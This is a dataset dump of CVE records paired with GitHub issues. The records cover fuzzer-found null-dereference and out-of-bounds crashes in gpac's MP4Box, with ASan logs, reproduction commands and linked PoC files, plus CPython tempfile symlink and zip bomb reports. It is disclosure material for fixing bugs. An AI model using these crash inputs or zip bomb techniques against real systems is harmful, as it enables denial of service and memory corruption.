This is a GitHub Issue repo:gpac owner:gpac Title : Null pointer deference in gf_dash_setup_period at media_tools/dash_client.c:6333 Issue date: --- start body --- # Description Null pointer deference in gf_dash_setup_period at media_tools/dash_client.c:6333 # Version ``` git log commit 7edc40feef23efd8c9948292d269eae76fa475af (HEAD -> master, origin/master, origin/HEAD) Author: jeanlf <jeanlf@gpac.io> Date: Thu Oct 12 16:58:53 2023 +0200 ./bin/gcc/MP4Box -version MP4Box - GPAC version 2.3-DEV-rev588-g7edc40fee-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io ``` # Poc : https://github.com/Janette88/test_pocs/blob/main/poc15 # Reproduce ``` compile: ./configure --enable-sanitizer make ``` ``` ./bin/gcc/MP4Box -dash 1000 /home/fuzz/crashes/poc15 [DASH] Updated manifest: P#1: start 0 - duration 0 - xlink none [DASH] Manifest after update: P#1: start 0 - duration 0 - xlink none [DASH] Setting up period start 0 duration 0 xlink none ID DID1 media_tools/dash_client.c:6333:9: runtime error: null pointer passed as argument 1, which is declared to never be null ``` ``` Asan log: ./bin/gcc/MP4Box -dash 1000 /home/fuzz/crash/poc15 [DASH] Updated manifest: P#1: start 0 - duration 0 - xlink none [DASH] Manifest after update: P#1: start 0 - duration 0 - xlink none [DASH] Setting up period start 0 duration 0 xlink none ID DID1 AddressSanitizer:DEADLYSIGNAL ================================================================= ==2807995==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000043f7e0 bp 0x7ffe04691450 sp 0x7ffe04690bf0 T0) ==2807995==The signal is caused by a READ memory access. ==2807995==Hint: address points to the zero page. #0 0x43f7e0 in strcmp (/home/fuzz/gpac/gpac/bin/gcc/MP4Box+0x43f7e0) #1 0x7fe80797751b in gf_dash_setup_period (/home/fuzz/gpac/gpac/bin/gcc/libgpac.so.12+0xd4851b) #2 0x7fe80792b0be in gf_dash_process (/home/fuzz/gpac/gpac/bin/gcc/libgpac.so.12+0xcfc0be) #3 0x7fe807fc31d3 in dashdmx_process (/home/fuzz/gpac/gpac/bin/gcc/libgpac.so.12+0x13941d3) #4 0x7fe807e90d3e in gf_filter_process_task (/home/fuzz/gpac/gpac/bin/gcc/libgpac.so.12+0x1261d3e) #5 0x7fe807e5ed86 in gf_fs_thread_proc (/home/fuzz/gpac/gpac/bin/gcc/libgpac.so.12+0x122fd86) #6 0x7fe807e5d67f in gf_fs_run (/home/fuzz/gpac/gpac/bin/gcc/libgpac.so.12+0x122e67f) #7 0x7fe8077fb9e7 in gf_dasher_process (/home/fuzz/gpac/gpac/bin/gcc/libgpac.so.12+0xbcc9e7) #8 0x50205c in do_dash /home/fuzz/gpac/gpac/applications/mp4box/mp4box.c:4831:15 #9 0x4f34ee in mp4box_main /home/fuzz/gpac/gpac/applications/mp4box/mp4box.c:6245:7 #10 0x7fe8068b0082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #11 0x42ad4d in _start (/home/fuzz/gpac/gpac/bin/gcc/MP4Box+0x42ad4d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/home/fuzz/gpac/gpac/bin/gcc/MP4Box+0x43f7e0) in strcmp ==2807995==ABORTING ``` # Impact: The vulnerability can potentially cause a crash or other effects. # Credit: Janette88 (Jq Wang) --- end body --- comments : --- start comments --- --- end comments ---
3,235
CVE-2024-28318
2024-03-15T15:15:08.977
gpac 2.3-DEV-rev921-g422b78ecf-master was discovered to contain a out of boundary write vulnerability via swf_get_string at scene_manager/swf_parse.c:325
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/gpac/gpac/issues/2764" } ]
null
null
[ "gpac", "gpac" ]
Issue
# Description ``` Out of write in swf_get_string at scene_manager/swf_parse.c:325 ``` # Version ``` git log commit 422b78ecf79ceeee97104d219cc4f184b1348cec (HEAD -> master, origin/master, origin/HEAD) Author: Aurelien David <aurelien.david@telecom-paristech.fr> Date: Mon Feb 26 10:53:25 2024 +0100 ./MP4Box -version MP4Box - GPAC version 2.3-DEV-rev921-g422b78ecf-master ``` # Asan log ``` ./MP4Box -info test2.dat SWF Import - Scene Size -230376x-52424.6 - 56880 frames @ 145 FPS [TXTIn] swf -> svg not fully migrated, using SWF flags 0 and no flatten angle. Patch welcome [SWF Parsing] Tag UnknownTag (0x37b) not implemented - skipping (frame 1) [SWF Parsing] Tag UnknownTag (0x94) not implemented - skipping (frame 1) [SWF Parsing] Tag FreeCharacter (0x 3) not implemented - skipping (frame 1) [SWF Parsing] Tag UnknownTag (0x35) not implemented - skipping (frame 1) [SWF Parsing] Tag UnknownTag (0x1fc) not implemented - skipping (frame 1) [SWF Parsing] Tag UnknownTag (0x137) not implemented - skipping (frame 1) [SWF Parsing] Tag UnknownTag (0x68) not implemented - skipping (frame 1) [SWF Parsing] Tag UnknownTag (0x3fc) not implemented - skipping (frame 1) [SWF Parsing] Tag UnknownTag (0x5c) not implemented - skipping (frame 1) [SWF Parsing] Tag UnknownTag (0x158) not implemented - skipping (frame 1) AddressSanitizer:DEADLYSIGNAL ================================================================= ==3594==ERROR: AddressSanitizer: SEGV on unknown address 0x7ffec244f28f (pc 0x7f8801ebe5ee bp 0x7ffdc244f760 sp 0x7ffdc244f230 T0) ==3594==The signal is caused by a WRITE memory access. #0 0x7f8801ebe5ed in swf_get_string scene_manager/swf_parse.c:325 #1 0x7f8801ed40b0 in swf_def_edit_text scene_manager/swf_parse.c:1718 #2 0x7f8801ed40b0 in swf_process_tag scene_manager/swf_parse.c:2355 #3 0x7f8801ed40b0 in swf_parse_tag scene_manager/swf_parse.c:2417 #4 0x7f88025da329 in gf_text_process_swf filters/load_text.c:2554 #5 0x7f88025da329 in gf_text_process_swf filters/load_text.c:2531 #6 0x7f88025ef9d3 in txtin_process filters/load_text.c:4025 #7 0x7f88022da2b5 in gf_filter_process_task filter_core/filter.c:3025 #8 0x7f88022a73f1 in gf_fs_thread_proc filter_core/filter_session.c:2100 #9 0x7f88022ac1a6 in gf_fs_run filter_core/filter_session.c:2400 #10 0x7f8801ccd406 in gf_media_import media_tools/media_import.c:1239 #11 0x55b1a98da4b1 in convert_file_info /home/fuzz/gpac/applications/mp4box/fileimport.c:130 #12 0x55b1a98a4ff4 in mp4box_main /home/fuzz/gpac/applications/mp4box/mp4box.c:6391 #13 0x7f87fee93082 in __libc_start_main ../csu/libc-start.c:308 #14 0x55b1a987c09d in _start (/home/fuzz/gpac/bin/gcc/MP4Box+0xa609d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV scene_manager/swf_parse.c:325 in swf_get_string ==3594==ABORTING ``` # poc download: https://github.com/Janette88/test_pocs/blob/main/test2.dat # impact **Impact** An OOB write on the heap can potentially cause a crash or information disclosure in some cases. Could be leveraged with other vulnerabilities for a more serious impact.
Out of write in swf_get_string at scene_manager/swf_parse.c:325
https://api.github.com/repos/gpac/gpac/issues/2764/comments
0
2024-02-27T07:59:08Z
2024-02-27T13:59:41Z
https://github.com/gpac/gpac/issues/2764
2,155,912,726
2,764
[ -0.03485049679875374, 0.02528729848563671, -0.0033678084146231413, 0.04067423567175865, 0.06326422095298767, 0.025195345282554626, -0.024873506277799606, 0.04358610883355141, -0.04870487004518509, -0.010168558917939663, 0.0044750855304300785, 0.029225986450910568, 0.02591565065085888, 0.00...
1,122
This is a GitHub Issue repo:gpac owner:gpac Title : Out of write in swf_get_string at scene_manager/swf_parse.c:325 Issue date: --- start body --- # Description ``` Out of write in swf_get_string at scene_manager/swf_parse.c:325 ``` # Version ``` git log commit 422b78ecf79ceeee97104d219cc4f184b1348cec (HEAD -> master, origin/master, origin/HEAD) Author: Aurelien David <aurelien.david@telecom-paristech.fr> Date: Mon Feb 26 10:53:25 2024 +0100 ./MP4Box -version MP4Box - GPAC version 2.3-DEV-rev921-g422b78ecf-master ``` # Asan log ``` ./MP4Box -info test2.dat SWF Import - Scene Size -230376x-52424.6 - 56880 frames @ 145 FPS [TXTIn] swf -> svg not fully migrated, using SWF flags 0 and no flatten angle. Patch welcome [SWF Parsing] Tag UnknownTag (0x37b) not implemented - skipping (frame 1) [SWF Parsing] Tag UnknownTag (0x94) not implemented - skipping (frame 1) [SWF Parsing] Tag FreeCharacter (0x 3) not implemented - skipping (frame 1) [SWF Parsing] Tag UnknownTag (0x35) not implemented - skipping (frame 1) [SWF Parsing] Tag UnknownTag (0x1fc) not implemented - skipping (frame 1) [SWF Parsing] Tag UnknownTag (0x137) not implemented - skipping (frame 1) [SWF Parsing] Tag UnknownTag (0x68) not implemented - skipping (frame 1) [SWF Parsing] Tag UnknownTag (0x3fc) not implemented - skipping (frame 1) [SWF Parsing] Tag UnknownTag (0x5c) not implemented - skipping (frame 1) [SWF Parsing] Tag UnknownTag (0x158) not implemented - skipping (frame 1) AddressSanitizer:DEADLYSIGNAL ================================================================= ==3594==ERROR: AddressSanitizer: SEGV on unknown address 0x7ffec244f28f (pc 0x7f8801ebe5ee bp 0x7ffdc244f760 sp 0x7ffdc244f230 T0) ==3594==The signal is caused by a WRITE memory access. #0 0x7f8801ebe5ed in swf_get_string scene_manager/swf_parse.c:325 #1 0x7f8801ed40b0 in swf_def_edit_text scene_manager/swf_parse.c:1718 #2 0x7f8801ed40b0 in swf_process_tag scene_manager/swf_parse.c:2355 #3 0x7f8801ed40b0 in swf_parse_tag scene_manager/swf_parse.c:2417 #4 0x7f88025da329 in gf_text_process_swf filters/load_text.c:2554 #5 0x7f88025da329 in gf_text_process_swf filters/load_text.c:2531 #6 0x7f88025ef9d3 in txtin_process filters/load_text.c:4025 #7 0x7f88022da2b5 in gf_filter_process_task filter_core/filter.c:3025 #8 0x7f88022a73f1 in gf_fs_thread_proc filter_core/filter_session.c:2100 #9 0x7f88022ac1a6 in gf_fs_run filter_core/filter_session.c:2400 #10 0x7f8801ccd406 in gf_media_import media_tools/media_import.c:1239 #11 0x55b1a98da4b1 in convert_file_info /home/fuzz/gpac/applications/mp4box/fileimport.c:130 #12 0x55b1a98a4ff4 in mp4box_main /home/fuzz/gpac/applications/mp4box/mp4box.c:6391 #13 0x7f87fee93082 in __libc_start_main ../csu/libc-start.c:308 #14 0x55b1a987c09d in _start (/home/fuzz/gpac/bin/gcc/MP4Box+0xa609d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV scene_manager/swf_parse.c:325 in swf_get_string ==3594==ABORTING ``` # poc download: https://github.com/Janette88/test_pocs/blob/main/test2.dat # impact **Impact** An OOB write on the heap can potentially cause a crash or information disclosure in some cases. Could be leveraged with other vulnerabilities for a more serious impact. --- end body --- comments : --- start comments --- --- end comments ---
3,404
CVE-2024-28319
2024-03-15T15:15:09.020
gpac 2.3-DEV-rev921-g422b78ecf-master was discovered to contain an out of boundary read vulnerability via gf_dash_setup_period media_tools/dash_client.c:6374
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/gpac/gpac/issues/2763" } ]
null
null
[ "gpac", "gpac" ]
Issue
# Description ``` Out of Read in gf_dash_setup_period media_tools/dash_client.c:6374 ``` # Version ``` git log commit 422b78ecf79ceeee97104d219cc4f184b1348cec (HEAD -> master, origin/master, origin/HEAD) Author: Aurelien David <aurelien.david@telecom-paristech.fr> Date: Mon Feb 26 10:53:25 2024 +0100 ./MP4Box -version MP4Box - GPAC version 2.3-DEV-rev921-g422b78ecf-master ``` ``` ./configure --enable-sanitizer make ``` # ASAN log ``` ./MP4Box -info ok2.dat [DASH] Updated manifest: P#1: start 0 - duration 0 - xlink none [DASH] Manifest after update: P#1: start 0 - duration 0 - xlink none [DASH] Setting up period start 0 duration 0 xlink none ID DID1 AddressSanitizer:DEADLYSIGNAL ================================================================= ==112724==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f6994dc5a47 bp 0x7ffd323b6110 sp 0x7ffd323b60c8 T0) ==112724==The signal is caused by a READ memory access. ==112724==Hint: address points to the zero page. #0 0x7f6994dc5a46 (/lib/x86_64-linux-gnu/libc.so.6+0x184a46) #1 0x7f6994cd4db5 in _IO_str_init_static_internal /build/glibc-wuryBv/glibc-2.31/libio/strops.c:41 #2 0x7f6994ca4421 in _IO_strfile_read ../libio/strfile.h:95 #3 0x7f6994ca4421 in __GI___isoc99_vsscanf /build/glibc-wuryBv/glibc-2.31/stdio-common/isoc99_vsscanf.c:33 #4 0x7f699ac85854 in __interceptor___isoc99_vsscanf ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1474 #5 0x7f699ac8597e in __interceptor___isoc99_sscanf ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1497 #6 0x7f6997b5d12e in gf_dash_setup_period media_tools/dash_client.c:6374 #7 0x7f6997b5d12e in dash_setup_period_and_groups media_tools/dash_client.c:7736 #8 0x7f6997b5d12e in gf_dash_process_internal media_tools/dash_client.c:8068 #9 0x7f6997b5d12e in gf_dash_process media_tools/dash_client.c:8139 #10 0x7f69981f1f15 in dashdmx_process filters/dmx_dash.c:3194 #11 0x7f69980ac2b5 in gf_filter_process_task filter_core/filter.c:3025 #12 0x7f69980793f1 in gf_fs_thread_proc filter_core/filter_session.c:2100 #13 0x7f699807e1a6 in gf_fs_run filter_core/filter_session.c:2400 #14 0x7f6997a9f406 in gf_media_import media_tools/media_import.c:1239 #15 0x563a09e4b4b1 in convert_file_info /home/fuzz/gpac/applications/mp4box/fileimport.c:130 #16 0x563a09e15ff4 in mp4box_main /home/fuzz/gpac/applications/mp4box/mp4box.c:6391 #17 0x7f6994c65082 in __libc_start_main ../csu/libc-start.c:308 #18 0x563a09ded09d in _start (/home/fuzz/gpac/bin/gcc/MP4Box+0xa609d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0x184a46) ==112724==ABORTING ``` ``` poc download: https://github.com/Janette88/test_pocs/blob/main/ok2.dat ``` ``` **Impact** An OOB read on the heap can potentially cause a crash or information disclosure in some cases. Could be leveraged with other vulnerabilities for a more serious impact. ``` Credit: Jq Wang
Out of Read in gf_dash_setup_period media_tools/dash_client.c:6374
https://api.github.com/repos/gpac/gpac/issues/2763/comments
0
2024-02-27T02:31:15Z
2024-02-27T13:59:40Z
https://github.com/gpac/gpac/issues/2763
2,155,523,042
2,763
[ -0.04481612145900726, 0.002722382778301835, -0.0054998029954731464, 0.01235195156186819, 0.029327040538191795, -0.010347019881010056, -0.033399805426597595, 0.04689181596040726, -0.04236302897334099, 0.00923054851591587, -0.009254136122763157, 0.003483077511191368, 0.03387155383825302, -0....
1,123
This is a GitHub Issue repo:gpac owner:gpac Title : Out of Read in gf_dash_setup_period media_tools/dash_client.c:6374 Issue date: --- start body --- # Description ``` Out of Read in gf_dash_setup_period media_tools/dash_client.c:6374 ``` # Version ``` git log commit 422b78ecf79ceeee97104d219cc4f184b1348cec (HEAD -> master, origin/master, origin/HEAD) Author: Aurelien David <aurelien.david@telecom-paristech.fr> Date: Mon Feb 26 10:53:25 2024 +0100 ./MP4Box -version MP4Box - GPAC version 2.3-DEV-rev921-g422b78ecf-master ``` ``` ./configure --enable-sanitizer make ``` # ASAN log ``` ./MP4Box -info ok2.dat [DASH] Updated manifest: P#1: start 0 - duration 0 - xlink none [DASH] Manifest after update: P#1: start 0 - duration 0 - xlink none [DASH] Setting up period start 0 duration 0 xlink none ID DID1 AddressSanitizer:DEADLYSIGNAL ================================================================= ==112724==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f6994dc5a47 bp 0x7ffd323b6110 sp 0x7ffd323b60c8 T0) ==112724==The signal is caused by a READ memory access. ==112724==Hint: address points to the zero page. #0 0x7f6994dc5a46 (/lib/x86_64-linux-gnu/libc.so.6+0x184a46) #1 0x7f6994cd4db5 in _IO_str_init_static_internal /build/glibc-wuryBv/glibc-2.31/libio/strops.c:41 #2 0x7f6994ca4421 in _IO_strfile_read ../libio/strfile.h:95 #3 0x7f6994ca4421 in __GI___isoc99_vsscanf /build/glibc-wuryBv/glibc-2.31/stdio-common/isoc99_vsscanf.c:33 #4 0x7f699ac85854 in __interceptor___isoc99_vsscanf ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1474 #5 0x7f699ac8597e in __interceptor___isoc99_sscanf ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:1497 #6 0x7f6997b5d12e in gf_dash_setup_period media_tools/dash_client.c:6374 #7 0x7f6997b5d12e in dash_setup_period_and_groups media_tools/dash_client.c:7736 #8 0x7f6997b5d12e in gf_dash_process_internal media_tools/dash_client.c:8068 #9 0x7f6997b5d12e in gf_dash_process media_tools/dash_client.c:8139 #10 0x7f69981f1f15 in dashdmx_process filters/dmx_dash.c:3194 #11 0x7f69980ac2b5 in gf_filter_process_task filter_core/filter.c:3025 #12 0x7f69980793f1 in gf_fs_thread_proc filter_core/filter_session.c:2100 #13 0x7f699807e1a6 in gf_fs_run filter_core/filter_session.c:2400 #14 0x7f6997a9f406 in gf_media_import media_tools/media_import.c:1239 #15 0x563a09e4b4b1 in convert_file_info /home/fuzz/gpac/applications/mp4box/fileimport.c:130 #16 0x563a09e15ff4 in mp4box_main /home/fuzz/gpac/applications/mp4box/mp4box.c:6391 #17 0x7f6994c65082 in __libc_start_main ../csu/libc-start.c:308 #18 0x563a09ded09d in _start (/home/fuzz/gpac/bin/gcc/MP4Box+0xa609d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0x184a46) ==112724==ABORTING ``` ``` poc download: https://github.com/Janette88/test_pocs/blob/main/ok2.dat ``` ``` **Impact** An OOB read on the heap can potentially cause a crash or information disclosure in some cases. Could be leveraged with other vulnerabilities for a more serious impact. ``` Credit: Jq Wang --- end body --- comments : --- start comments --- --- end comments ---
3,352
CVE-2023-6597
2024-03-19T16:15:08.743
An issue was found in the CPython `tempfile.TemporaryDirectory` class affecting versions 3.12.1, 3.11.7, 3.10.13, 3.9.18, and 3.8.18 and prior. The tempfile.TemporaryDirectory class would dereference symlinks during cleanup of permissions-related errors. This means users which can run privileged programs are potentially able to modify permissions of files referenced by symlinks in some circumstances.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 1.4, "impactScore": 5.8, "source": "cna@python.org", "type": "Secondary" } ] }
[ { "source": "cna@python.org", "tags": null, "url": "http://www.openwall.com/lists/oss-security/2024/03/20/5" }, { "source": "cna@python.org", "tags": null, "url": "https://github.com/python/cpython/commit/02a9259c717738dfe6b463c44d7e17f2b6d2cb3a" }, { "source": "cna@python.org", ...
null
null
[ "python", "cpython" ]
Issue
BPO | [46977](https://bugs.python.org/issue46977) --- | :--- Nosy | @afeblot <sup>*Note: these values reflect the state of the issue at the time it was migrated and might not reflect the current state.*</sup> <details><summary>Show more details</summary><p> GitHub fields: ```python assignee = None closed_at = None created_at = <Date 2022-03-10.17:22:08.506> labels = ['library', '3.9', 'type-crash'] title = 'tempfile.TemporaryDirectory fails removing dir in some edge cases related to symlinks' updated_at = <Date 2022-03-10.17:25:32.378> user = 'https://github.com/afeblot' ``` bugs.python.org fields: ```python activity = <Date 2022-03-10.17:25:32.378> actor = 'afeblot' assignee = 'none' closed = False closed_date = None closer = None components = ['Library (Lib)'] creation = <Date 2022-03-10.17:22:08.506> creator = 'afeblot' dependencies = [] files = [] hgrepos = [] issue_num = 46977 keywords = [] message_count = 1.0 messages = ['414871'] nosy_count = 1.0 nosy_names = ['afeblot'] pr_nums = [] priority = 'normal' resolution = None stage = None status = 'open' superseder = None type = 'crash' url = 'https://bugs.python.org/issue46977' versions = ['Python 3.9'] ``` </p></details> <!-- gh-linked-prs --> ### Linked PRs * gh-99930 * gh-112838 * gh-112839 * gh-112840 * gh-112842 * gh-112843 <!-- /gh-linked-prs -->
tempfile.TemporaryDirectory fails removing dir in some edge cases related to symlinks [CVE-2023-6597]
https://api.github.com/repos/python/cpython/issues/91133/comments
6
2022-03-10T17:22:09Z
2024-05-15T15:20:23Z
https://github.com/python/cpython/issues/91133
1,199,076,757
91,133
[ -0.03331015259027481, -0.034768085926771164, -0.003768396098166704, 0.01076772902160883, 0.023957114666700363, 0.03575652092695236, 0.05426490306854248, 0.0063506742008030415, -0.0005061851697973907, 0.018631938844919205, -0.0044324989430606365, 0.01974392496049404, -0.03204990178346634, -...
1,124
This is a GitHub Issue repo:cpython owner:python Title : tempfile.TemporaryDirectory fails removing dir in some edge cases related to symlinks [CVE-2023-6597] Issue date: --- start body --- BPO | [46977](https://bugs.python.org/issue46977) --- | :--- Nosy | @afeblot <sup>*Note: these values reflect the state of the issue at the time it was migrated and might not reflect the current state.*</sup> <details><summary>Show more details</summary><p> GitHub fields: ```python assignee = None closed_at = None created_at = <Date 2022-03-10.17:22:08.506> labels = ['library', '3.9', 'type-crash'] title = 'tempfile.TemporaryDirectory fails removing dir in some edge cases related to symlinks' updated_at = <Date 2022-03-10.17:25:32.378> user = 'https://github.com/afeblot' ``` bugs.python.org fields: ```python activity = <Date 2022-03-10.17:25:32.378> actor = 'afeblot' assignee = 'none' closed = False closed_date = None closer = None components = ['Library (Lib)'] creation = <Date 2022-03-10.17:22:08.506> creator = 'afeblot' dependencies = [] files = [] hgrepos = [] issue_num = 46977 keywords = [] message_count = 1.0 messages = ['414871'] nosy_count = 1.0 nosy_names = ['afeblot'] pr_nums = [] priority = 'normal' resolution = None stage = None status = 'open' superseder = None type = 'crash' url = 'https://bugs.python.org/issue46977' versions = ['Python 3.9'] ``` </p></details> <!-- gh-linked-prs --> ### Linked PRs * gh-99930 * gh-112838 * gh-112839 * gh-112840 * gh-112842 * gh-112843 <!-- /gh-linked-prs --> --- end body --- comments : --- start comments --- --- end comments ---
1,599
CVE-2024-0450
2024-03-19T16:15:09.180
An issue was found in the CPython `zipfile` module affecting versions 3.12.1, 3.11.7, 3.10.13, 3.9.18, and 3.8.18 and prior. The zipfile module is vulnerable to “quoted-overlap” zip-bombs which exploit the zip format to create a zip-bomb with a high compression ratio. The fixed versions of CPython makes the zipfile module reject zip archives which overlap entries in the archive.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.5, "impactScore": 3.6, "source": "cna@python.org", "type": "Secondary" } ] }
[ { "source": "cna@python.org", "tags": null, "url": "http://www.openwall.com/lists/oss-security/2024/03/20/5" }, { "source": "cna@python.org", "tags": null, "url": "https://github.com/python/cpython/commit/30fe5d853b56138dbec62432d370a1f99409fc85" }, { "source": "cna@python.org", ...
null
null
[ "python", "cpython" ]
Issue
# Bug report ### Bug description: Just found this vulnerability in the latest Python 3.11.5 (and previous 3.10.10). If we craft a zipbomb using the "quoted-overlap" way (as mentioned [https://www.bamsoftware.com/hacks/zipbomb/](https://urldefense.com/v3/__https://www.bamsoftware.com/hacks/zipbomb/__;!!ACWV5N9M2RV99hQ!NeHC7dlBypbGhcmQALXGCNyt3gJ-N86F3rJ3GczFSLYbl0kR34I67_YZCxbseU0GGIxRGc4gcPu4Sw$)), this can't be detected by Python's zip file and the zip will be extracted and thus potentially cause a DoS attack by consuming all the storage. This issue is related to CVE-2019-9674 but not the same. CVE-2019-9674 is talking about the "normal" overlap-zipbomb which is a "full" overlap. This can already be detected by Python's new version of zipfile. However, when we craft a "quoted-overlap" zip, as indicated by [https://www.bamsoftware.com/hacks/zipbomb/](https://urldefense.com/v3/__https://www.bamsoftware.com/hacks/zipbomb/__;!!ACWV5N9M2RV99hQ!NeHC7dlBypbGhcmQALXGCNyt3gJ-N86F3rJ3GczFSLYbl0kR34I67_YZCxbseU0GGIxRGc4gcPu4Sw$), python can't detect and happily starts to extract. For example, the following is the python to extract a zip file, 116 KB before extraction, goes to as large as 17GB after extraction. The size after extraction can be easily increased to multi TBs or even PBs by adjusting the zip-creation. ```python import zipfile import sys import os def extract_zip(zip_path): """ Extracts the contents of a ZIP file to the current directory. :param zip_path: Path to the ZIP file """ if not os.path.exists(zip_path): print(f"Error: {zip_path} does not exist.") return with zipfile.ZipFile(zip_path, 'r') as zip_ref: zip_ref.extractall() print(f"Extracted contents of {zip_path} to the current directory.") if __name__ == "__main__": if len(sys.argv) != 2: print("Usage: python extract_zip.py <path_to_zip_file>") sys.exit(1) zip_file_path = sys.argv[1] extract_zip(zip_file_path) ``` ### CPython versions tested on: 3.11 ### Operating systems tested on: Linux <!-- gh-linked-prs --> ### Linked PRs * gh-110016 * gh-113912 * gh-113913 * gh-113914 * gh-113915 * gh-113916 * gh-113918 <!-- /gh-linked-prs -->
Python "zipfile" can't detect "quoted-overlap" zipbomb that can be used as a DoS attack
https://api.github.com/repos/python/cpython/issues/109858/comments
12
2023-09-25T16:54:41Z
2024-05-15T15:21:04Z
https://github.com/python/cpython/issues/109858
1,911,928,055
109,858
[ -0.03647473827004433, 0.01606975868344307, -0.0095334742218256, 0.045038141310214996, 0.014544402249157429, 0.02305428311228752, 0.022371886298060417, 0.026827530935406685, -0.0019635611679404974, 0.011025379411876202, 0.007432764861732721, -0.005526070017367601, 0.016564829275012016, -0.0...
1,125
This is a GitHub Issue repo:cpython owner:python Title : Python "zipfile" can't detect "quoted-overlap" zipbomb that can be used as a DoS attack Issue date: --- start body --- # Bug report ### Bug description: Just found this vulnerability in the latest Python 3.11.5 (and previous 3.10.10). If we craft a zipbomb using the "quoted-overlap" way (as mentioned [https://www.bamsoftware.com/hacks/zipbomb/](https://urldefense.com/v3/__https://www.bamsoftware.com/hacks/zipbomb/__;!!ACWV5N9M2RV99hQ!NeHC7dlBypbGhcmQALXGCNyt3gJ-N86F3rJ3GczFSLYbl0kR34I67_YZCxbseU0GGIxRGc4gcPu4Sw$)), this can't be detected by Python's zip file and the zip will be extracted and thus potentially cause a DoS attack by consuming all the storage. This issue is related to CVE-2019-9674 but not the same. CVE-2019-9674 is talking about the "normal" overlap-zipbomb which is a "full" overlap. This can already be detected by Python's new version of zipfile. However, when we craft a "quoted-overlap" zip, as indicated by [https://www.bamsoftware.com/hacks/zipbomb/](https://urldefense.com/v3/__https://www.bamsoftware.com/hacks/zipbomb/__;!!ACWV5N9M2RV99hQ!NeHC7dlBypbGhcmQALXGCNyt3gJ-N86F3rJ3GczFSLYbl0kR34I67_YZCxbseU0GGIxRGc4gcPu4Sw$), python can't detect and happily starts to extract. For example, the following is the python to extract a zip file, 116 KB before extraction, goes to as large as 17GB after extraction. The size after extraction can be easily increased to multi TBs or even PBs by adjusting the zip-creation. ```python import zipfile import sys import os def extract_zip(zip_path): """ Extracts the contents of a ZIP file to the current directory. :param zip_path: Path to the ZIP file """ if not os.path.exists(zip_path): print(f"Error: {zip_path} does not exist.") return with zipfile.ZipFile(zip_path, 'r') as zip_ref: zip_ref.extractall() print(f"Extracted contents of {zip_path} to the current directory.") if __name__ == "__main__": if len(sys.argv) != 2: print("Usage: python extract_zip.py <path_to_zip_file>") sys.exit(1) zip_file_path = sys.argv[1] extract_zip(zip_file_path) ``` ### CPython versions tested on: 3.11 ### Operating systems tested on: Linux <!-- gh-linked-prs --> ### Linked PRs * gh-110016 * gh-113912 * gh-113913 * gh-113914 * gh-113915 * gh-113916 * gh-113918 <!-- /gh-linked-prs --> --- end body --- comments : --- start comments --- --- end comments ---
2,481
CVE-2024-29489
2024-03-28T23:15:46.527
Jerryscript 2.4.0 has SEGV at ./jerry-core/ecma/base/ecma-helpers.c:238:58 in ecma_get_object_type.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "https://gist.github.com/gandalf4a/9826a897ae1e3c8d1c7e71a1ec71d415" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/jerryscript-project/jerryscript/commit/cefd391772529c8a9531d7b3c244d78d38be47c6" }, { "s...
null
null
[ "jerryscript-project", "jerryscript" ]
Issue
